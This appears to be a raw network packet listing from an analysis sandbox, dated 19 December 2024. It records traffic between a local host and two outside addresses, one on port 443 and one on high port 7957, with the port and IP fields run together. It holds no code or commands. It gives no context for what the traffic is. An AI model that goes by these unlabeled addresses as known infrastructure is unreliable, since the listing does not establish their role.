                                                      Dec 19, 2024 09:29:18.282116890 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.282159090 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.288903952 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.288919926 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.289053917 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.289063931 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.289161921 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.293504000 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.293549061 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.293572903 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.293582916 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.293597937 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.293627977 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.293742895 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:18.293787003 CET44349710185.199.220.71192.168.2.6
                                                      Dec 19, 2024 09:29:18.293838978 CET49710443192.168.2.6185.199.220.71
                                                      Dec 19, 2024 09:29:49.255872011 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:49.375489950 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:49.375598907 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:49.375793934 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:49.495368004 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:50.606394053 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:50.607815027 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:50.727335930 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:50.997862101 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.023462057 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.143412113 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425240040 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425312996 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425323963 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425429106 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.425441980 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425455093 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425465107 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425477028 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425493002 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.425524950 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.425719976 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.425765991 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.433661938 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.433732986 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.433780909 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.442122936 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.442135096 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.442182064 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.544922113 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.599206924 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.617315054 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.617372036 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.617456913 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.621304035 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.621335983 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.621386051 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.629183054 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.629256010 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.629308939 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.636792898 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.636818886 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.636866093 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.644768953 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.644848108 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.644912004 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.652627945 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.652750969 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.652826071 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.660746098 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.660775900 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.660815954 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.668598890 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.668757915 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.668808937 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.676695108 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.676708937 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.676745892 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.684504032 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.684771061 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.684819937 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.692465067 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.692533016 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.692574024 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.718765974 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.718975067 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.719047070 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.722870111 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.771091938 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.809429884 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.809571981 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.809639931 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.813425064 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.813467979 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.813510895 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.821338892 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.821528912 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.821579933 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.829598904 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.829715967 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.829763889 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.836962938 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.837135077 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.837191105 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.844578981 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.844631910 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.844677925 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.852210999 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.852391005 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.852447033 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.859761000 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.859859943 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.859916925 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.864886999 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.864988089 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.865057945 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.869986057 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.870346069 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.870538950 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.874989986 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.875096083 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.875144005 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.880063057 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.880172014 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.880218029 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.885119915 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.885282040 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.885328054 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.890183926 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.890341043 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.890386105 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.895361900 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.895582914 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.895629883 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.900394917 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.900432110 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.900473118 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.905405045 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.905462027 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.905507088 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.910800934 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.910818100 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.910871983 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.915357113 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.915474892 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.915518045 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.920406103 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.920475960 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.920526981 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.925326109 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.925514936 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.925568104 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.930352926 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.930366993 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.930422068 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.935286999 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.935374022 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.935421944 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.940201998 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.940224886 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.940268040 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:51.945301056 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.945594072 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:51.945638895 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.001543999 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.001708984 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.001768112 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.003792048 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.003899097 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.003947020 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.008347034 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.008426905 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.008475065 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.013170958 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.013236046 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.013283014 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.017340899 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.017461061 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.017508984 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.021667957 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.021758080 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.021805048 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.025955915 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.026129961 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.026173115 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.029922962 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.030030012 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.030076981 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.033668995 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.033710957 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.033756018 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.037425041 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.037519932 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.037575006 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.041186094 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.041305065 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.041349888 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.044965029 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.044977903 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.045032978 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.048810959 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.048890114 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.048937082 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.051803112 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.051914930 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.051955938 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.055285931 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.055463076 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.055511951 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.058712006 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.058773994 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.058974981 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.060642958 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.060770035 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.060818911 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.062654018 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.062737942 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.062774897 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.064640045 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.064745903 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.064791918 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.066654921 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.066747904 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.066790104 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.068711996 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.068846941 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.068885088 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.070895910 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.071005106 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.071050882 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.072701931 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.072799921 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.072843075 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.074714899 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.074799061 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.074841976 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.076659918 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.076755047 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.076798916 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.078699112 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.078717947 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.078757048 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.080802917 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.080816031 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.080856085 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.082801104 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.082914114 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.082958937 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.084656954 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.084791899 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.084836960 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.086991072 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.087074995 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.087119102 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.088685036 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.088764906 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.088808060 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.090749025 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.090790033 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.090828896 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.092694044 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.092897892 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.092959881 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.094770908 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.094865084 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.094901085 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.096710920 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.096786976 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.096821070 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.098740101 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.098751068 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.098788023 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.100713968 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.100790024 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.100825071 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.102788925 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.102912903 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.102969885 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.104696035 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.104804039 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.104857922 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.106858969 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.106957912 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.107002020 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.108658075 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.161712885 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.193720102 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.193850994 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.193897963 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.194540977 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.194659948 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.194710970 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.196501970 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.196749926 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.196799040 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.198435068 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.198582888 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.198631048 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.200351954 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.200551987 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.200597048 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.202157974 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.202267885 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.202306986 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.204159021 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.204216957 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.204265118 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.205761909 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.205864906 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.206017017 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.207550049 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.207638025 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.207679987 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.209275961 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.209397078 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.209443092 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.211015940 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.211146116 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.211189985 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.212604046 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.212707996 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.212754011 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.214308977 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.214349031 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.214396954 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.215843916 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.215995073 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.216037989 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.217432022 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.217525005 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.217586994 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.219017982 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.219089031 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.219126940 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.220552921 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.220659018 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.220705986 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.222076893 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.222151041 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.222193956 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.223650932 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.223769903 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.223809004 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.225250959 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.225265026 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:52.225300074 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:52.226553917 CET7957497925.35.36.120192.168.2.6
